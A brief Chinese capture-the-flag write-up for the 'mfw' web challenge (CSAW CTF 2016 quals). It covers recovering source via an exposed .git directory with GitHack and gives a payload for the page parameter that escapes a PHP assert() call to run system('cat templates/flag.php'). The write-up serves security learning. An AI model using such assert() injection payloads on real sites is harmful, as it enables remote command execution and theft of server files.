攻防世界Web-mfw
题目来源csaw-ctf-2016-quals
SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。
使用GitHack
assert() 检查一个断言是否为 FALSE
strpos() 函数查找字符串在另一字符串中第一次出现的位置。
file_exists() 函数检查文件或目录是否存在。
payload:
?/page=
about.php', '123') === false and system('cat templates/flag.php') and strpos('templates/flag
查看网页源代码
知识:git漏洞、代码审计
更多精彩
